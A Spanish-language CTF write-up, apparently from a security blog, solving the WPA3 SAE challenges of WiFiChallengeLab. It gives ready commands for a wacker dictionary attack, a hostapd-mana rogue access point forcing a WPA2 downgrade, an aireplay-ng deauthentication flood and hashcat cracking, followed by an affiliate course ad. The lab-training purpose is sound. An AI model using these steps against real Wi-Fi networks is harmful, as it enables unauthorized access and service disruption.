3,2,1 … Empezamos!
Nueva entrada en el blog en la cual vamos a resolver el primer apartado del CTF WiFiChallengeLab creado por Raúl Calvo Laorden, que corresponde a “SAE”. Una red WPA3 SAE (Autenticación Simultánea de Iguales) es un protocolo de seguridad que mejora la protección contra ataques de fuerza bruta. Utiliza un método de autenticación más seguro que el WPA2, ofreciendo una mejor protección individualizada y un cifrado más fuerte para los usuarios de redes Wi-Fi. Una de las ventajas de este tipo de seguridad es que, incluso cuando los usuarios eligen contraseñas que no cumplen con las recomendaciones típicas de complejidad, el sistema provee un handshake seguro, que resiste los ataques por diccionario.
Se recomienda leer estos artículos antes de continuar con la lectura:
- Wi-Fi desde 0
- Wi-Fi desde 0 – Configuración del entorno
- Wi-Fi desde 0 – Recon
- Wi-Fi desde 0 – OPN
- Wi-Fi desde 0 – WEP
- Wi-Fi desde 0 – PSK
¡Espero que os resulte útil!

En cada challenge tenéis la descripción y pistas para resolverlo en caso de ser necesario.
13. ¿Cuál es la contraseña de wifi-management?
(13. What is the wifi-management password?)
En este primer challenge vamos a emplear un ataque de fuerza bruta para descubrir la contraseña de wifi-management, debido a que en las redes WPA3 se sigue permitiendo realizar este tipos de ataques para la obtención de la contraseña.
Para ello, vamos a emplear la herramienta wacker. Wacker es una herramienta que está compuesta por un conjunto de scripts que ayuda a realizar un ataque de diccionario contra un punto de acceso WPA3.
El comando que vamos a emplear es el siguiente:
sudo su
cd /root/tools/wacker/
./wacker.py --wordlist /root/rockyou-top100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan0 --freq 2462A continuación, vamos a explicar que es cada parámetro:
./wacker.py: Este es el script principal que se está ejecutando.--wordlist: Listado de palabras para usar en el ataque de diccionario.--ssid: Se especifica el SSID (nombre) del punto de acceso al que se va a atacar.--bssid: Se especifica la dirección BSSID del punto de acceso al que se va a atacar.--interface: Se indica la interfaz de red a usar en el ataque.--freq: Se especifica la frecuencia del canal Wi-Fi del punto de acceso a atacar.


14. ¿Cuál es la contraseña de wifi-IT?
(14. What is the wifi-IT password?)
Si un cliente está configurado para WPA2/WPA3 en una red que utiliza WPA3 SAE, es posible forzar un downgrade en el cliente para que se conecte a nuestro RogueAP con WPA2. De esta forma, podemos obtener el handshake y posteriormente crackearlo, tal como se hace en el challenge 11.
Podremos observar que emplea SAE y PSK en el fichero .csv que genera airodump-ng, lo cual indica que los clientes también aceptan PSK.
En primer lugar, cómo en anteriores retos, pararemos el servicio de NetworkManager que detendrá los procesos que podrían interferir con la suite de herramientas aircrack-ng e iniciamos la interfaz wlan0.
sudo airmon-ng check kill
sudo airmon-ng start wlan0
Si lanzamos un airodump-ng, podemos ver que utiliza SAE.
sudo airodump-ng --essid wifi-IT --band abg wlan0mon
Analizando el fichero generado ‘captura06-01.csv‘ en el challenge 06, podemos ver que la red wifi-IT admite tanto SAE como PSK, por lo que podemos realizar un downgrade a la red.
cat capturas/captura06-01.csv
Al igual que hemos hecho anteriormente, montamos el RogueAP con hostapd-mana.
pico wifi-it.confcat wifi-it.confinterface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=wifi-IT
mana_wpaout=wifi-it.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

Desplegamos el RogueAP con el siguiente comando:
sudo hostapd-mana wifi-it.confPara “forzar” que los usuarios se conecten a nuestro punto, realizamos una de-autenticación, al igual que en el challenge 07.
En primer lugar, indicamos que la interfaz wlan0mon esté en el canal 11 y posteriormente, lanzamos el ataque.
sudo iwconfig wlan0mon channel 11
sudo aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25
Una vez realizado la de-autenticación, podemos crackear el fichero generado wifi-it.hccapx.
sudo hashcat -a 0 -m 2500 wifi-it.hccapx /root/rockyou-top100000.txt --force

De esta forma, obtener la contraseña del AP wifi-IT.
Hasta aquí los 2 retos del apartado SAE.

¡Nos vemos en el próximo! 😊
| 🚀 ¿Quieres especializarte en auditorías WiFi? Si este artículo te ha resultado útil y quieres dar el siguiente paso, el CWP es uno de los cursos que recomiendo para aprender auditorías WiFi de forma práctica y estructurada. ✅ Laboratorios prácticos ✅ Metodología profesional ✅ Certificación incluida ✅ Ideal para pentesters y auditores Versión Español Versión Inglés Enlace de afiliado, al comprar desde este enlace apoyas el contenido de Cyber0asis sin coste adicional para ti 🤗 |






